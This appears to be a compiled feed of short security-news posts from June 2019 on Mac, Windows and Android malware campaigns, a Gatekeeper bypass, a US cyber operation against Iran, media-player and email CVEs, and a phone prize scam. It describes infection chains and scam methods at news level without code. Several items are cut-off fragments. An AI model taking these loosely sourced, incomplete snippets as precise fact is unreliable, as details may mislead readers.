A new Mac malware dubbed OSX/Linker leverages the recently disclosed macOS’ Gatekeeper vulnerability to get executed on victim’s machine without user permission or warnings.
The MacOS X GateKeeper zero-day vulnerability was publically disclosed by Filippo Cavallarin on May 24, as the Apple missed its 90 days deadline to fix the vulnerability.
The vulnerability resides in how the Gatekeeper treats the apps that loaded from a network share and the Internet. Gatekeeper, by default, considers the apps loaded from external drives and network shares as safe locations and allows to run without user consent. “As per-design, Gatekeeper considers both external drives and network shares as safe locations, and it allows any application they contain to run. By combining this design with two legitimate features of MacOS X, it will result in the complete deceivement of the intended behavior,” reads Filippo Cavallarin blog post.
Gatekeeper in apple is a mechanism to check for the presence of code signing certificates status and verifies the developer signature before allowing the application to execute.
Intego’s malware research team noted few attempts of OSX/Linker to leverage the Zero-day flaw in macOS Gatekeeper by using a disk image file(.dmg) that used to distribute Mac software.
Anonymous users uploaded the samples to virustotal, Intego spotted four such samples, the first sample uploaded by an anonymous user from Israel, after that within seven minutes other three samples uploaded form United States.
Intego believes all the files uploaded by the same user, possibly he forgot to mask the IP address for at the time of uploading the first sample. The IP referenced by the disk images’ symlinks has been taken down by hosting company or voluntarily. “It is not clear whether any of these specific disk images were ever part of an in-the-wild malware campaign. It is possible that these disk images, or subsequent disk images, may have been used in small-scale or targeted attacks, but so far this remains unknown.” As usual, the threat actors behind the campaign disguised the disk images as Adobe Flash Player installers to trick the Mac users.
Microsoft uncovered a new campaign with a sophisticated infection chain delivering notorious FlawedAmmyy RAT as a final payload. The attack starts with an email that contains .XLS attachments and the contents of the email in the Korean language.
Previous campaigns that involve FlawedAmmyy RAT are carried out by TA505 threat actors, upon successful execution of backdoor let an attacker to control the machine remotely, manages the files, captures the screen.
How the Infection Occurs
Malicious .XLS file delivered through email, when the file executed it automatically runs a macro function that runs Windows Installer msiexec.exe used for download & installing MSI and MSP packages.
The downloaded MSI archive contains a digitally signed executable that is extracted and executed, it decrypts and runs another executable wsus.exe in memory, which in turn decrypts and runs the final payload in the memory.
The final payload that delivered directly in memory is the FlawedAmmyy, according to Microsoft Security Intelligence. The FlawedAmmyy digitally signed using a code signing certificate issued Thawte to the company Dream Body Limited. It appears the rat was signed and timestamped on June 19 and the samples detected on June 22.
The FlawedAmmy RAT functions ⏺Remote Desktop control
⏺File system manager
Earlier this year TA505 distributed FlawedAmmyy RAT via weaponized MS Excel documents with malicious Excel 4.0 macro which is hard to detect by standard security controls.
Last October Cybercriminals used IQY Files to deliver FlawedAmmyy malware and executed the backdoor through PowerShell Process. .
C|EH is the world’s most advanced ethical hacking course covering 20 of the most important security domains any individual will need when they are planning to beef-up the information security posture of their organization.
Full offensive hacking course with hands-on real-world labs. It aims to empower penetration testing skills and to immerse students with advanced hacking tools and techniques. Students will be able to define, scan, and exploit different types of vulnerabilities by mastering ethical hacking methodology.
A new session starts on July 3, Tripoli Lebanon https://darebne.com/course/ec-council-certified-ethical-hacker-ceh-v10/
Researchers discovered a fake photo editing apps which are used by cybercriminals to launch MobOk Malware that takes complete control of the infected Android device.
Threat actors are targeting Android users through legitimate Google play store app and hiding this malware to steal money by letting users subscribe to premium services.
Two photo editor apps were uncovered ‘Pink Camera’ and ‘Pink Camera 2’ which has been installed nearly 10, 000 times.
These apps were intended for uploading in the Google play store to steal personal data from victims Android device and use that to sign them up to paid subscription services.
Researchers described this MobOk malware as a powerful backdoor since it has sophisticated capabilities to take almost complete control over the infected Android device.
Developers of this Pink Camera apps added evasion techniques to hide suspicious activities and avoid detection. The apps included a genuine photo editing functionality, and the users completely believe it since the app downloaded from the Google Play Store.
Once the app will be installed into the victims mobile, it requests to grant permission for the notification from the user and perform malicious activities in the background.
The primary motivation of these apps has subscribed the user to paid mobile subscription services.
MobOk Malware Infection Process
After the complete infection, MobOk malware starts collecting the device information, including phone number and the attackers send the webpage for the premium subscription, which requires users to pay for the service.
Meanwhile, The malware will open a secret browser in the background, and it uses the victim’s phone number that was already collected and the Malware would insert it into the “subscribe” field and confirm the purchase.
MobOk Malware already had complete control of the victims mobile, it grabs the SMS verification code notification and enters it on behalf of the user. .
6 14024 June, 2019
If you're offended or something just unfollow or block don't report
According to Tor, We expect to be able to publish the Android release this weekend. In the meantime, Android users should use the safer or safest security levels. The security level on Android can be changed by going in the menu on the right of the URL bar and selecting Security Settings. .
SQL injection is a technique which attacker takes non-validated input vulnerabilities and inject SQL commands through web applications that are executed in the backend database.
It is very easy and all we need to use the advanced operators in Google search engine and to locate the results with the strings. SQL injection currently ranked #1 on the OWASP Top 10 chart which means that it is responsible for a large portion of public disclosures and security breaches. .
United States Military launched a cyber attack on the Iranian Military computers that used to control the Iran missiles after the $240 million Worth U.S drone shootdown by Iran.
The attack was mainly targeting the Iran military computer systems with the approval of U.S president Trump and the cyber-attack disabled computer systems controlling rocket and missile launchers.
An Iran based spy group called Iranian Revolutionary Guard Corps tracked and attacked military and civilian ships for several years and also helps to Iran military to identify the intrusion of its air space.
U.S intelligence carefully focused the persistent cyber attacks and its targets and keep on issuing an alert to the government and military networks.
Last Thursday Iran Military shoot down the U.S based expensive military drone, in response, Trump authorized U.S Military to strike back to hit the Iran military computers.
In the Recent past, Iran based cyberespionage groups attempted to exploit various government, military networks, and other sectors including finance, oil, and gas by sending of spear-phishing emails. Multiple private U.S. cybersecurity firms reported it.
U.S. officials told the Wall Street Journal they fear heightened escalations not only in physical space but in cyberspace as well.
Iran Cyber intelligence capabilities are not much sophisticated than the U.S but they are continuously building their intelligence system to strike back for any attacks.
The National Security Council declined to comment on the Iranian cyber group or the U.S. Cyber Command response.
According to the Pentagon Spoke person told via Yahoo News, “as a matter of policy and for operational security, we do not discuss cyberspace operations, intelligence or planning.” Iranian intelligence system and experts are also capable of hijacking digital systems used in drones, and potentially even in ships, to spoof the GPS location of the device and plug in false coordinates. “They’ve been thinking a lot about drone capture because we’ve been flying drones over them for years,” says, James Lewis, a cyber expert from Washington, D.C. .
14 26423 June, 2019
on god i did not steal this. 🥰🥰😍😍🥰 ___________________________________
If you're offended or something just unfollow or block don't report
First, A buffer overflow vulnerability (CVE-2019-5439) that resides in ReadFrame (demux/avi/avi.c) allows a remote user can create some specially crafted avi or mkv files that will trigger a heap buffer overflow load into a targeted system.
According to Delhi Police, the KBC scam is nothing new and it happens every year while the show is being aired. What is alarming is that a large number of people are still falling for this scam because people ‘blindly believe their luck’. Here are some things one must keep in mind while staying alert about the scam-
1. The scammers make random calls to anyone on their database and sound convincing to the victim and people from all backgrounds fall for it.
2. If not voice calls, the scammers try to reach their victims over WhatsApp to lure them.
3. The scammer usually congratulates the victims by convincing them that they are calling from the KBC team to inform them of the prize money they have won by participating on the quiz.
4. The scammers somehow manages to convince that victim by saying, “Your family member might have taken part and called from your number.” when the victims deny taking part in the quiz.
5. Most of the numbers that are scam calls begin with ‘0092’ as per police complaints.
6. Scammers sometime introduce themselves as the KBC team and ask simple questions to make the victims ‘win’. Alternatively, they also say that the victim’s mobile number has been selected in the lucky draw.
7. The real scam begins after declaring the victim as a winner of the KBC contest, . The victim is then asked to deposit somewhere between Rs 8,000 and Rs 10,000 as tax money or processing fee to enable the KBC team to send the prize money of Rs 25 lakh or R 30 lakh. The processing fee is usually asked to be deposited in the form of bank drafts.
8. The comparatively low ‘processing fee’ of around Rs 10,000 makes people fall for the scam easily has the claimed prize money is around Rs 25 lakh or even higher.
According to Microsoft Update, “The security update addresses the vulnerability by correcting how Outlook for Android parses specially crafted email messages.” The vulnerability can track CVE-2019-1105, and the Cybersecurity and Infrastructure Security Agency (CISA) urged users and administrators to review the Microsoft Security Advisory and apply the necessary update. . .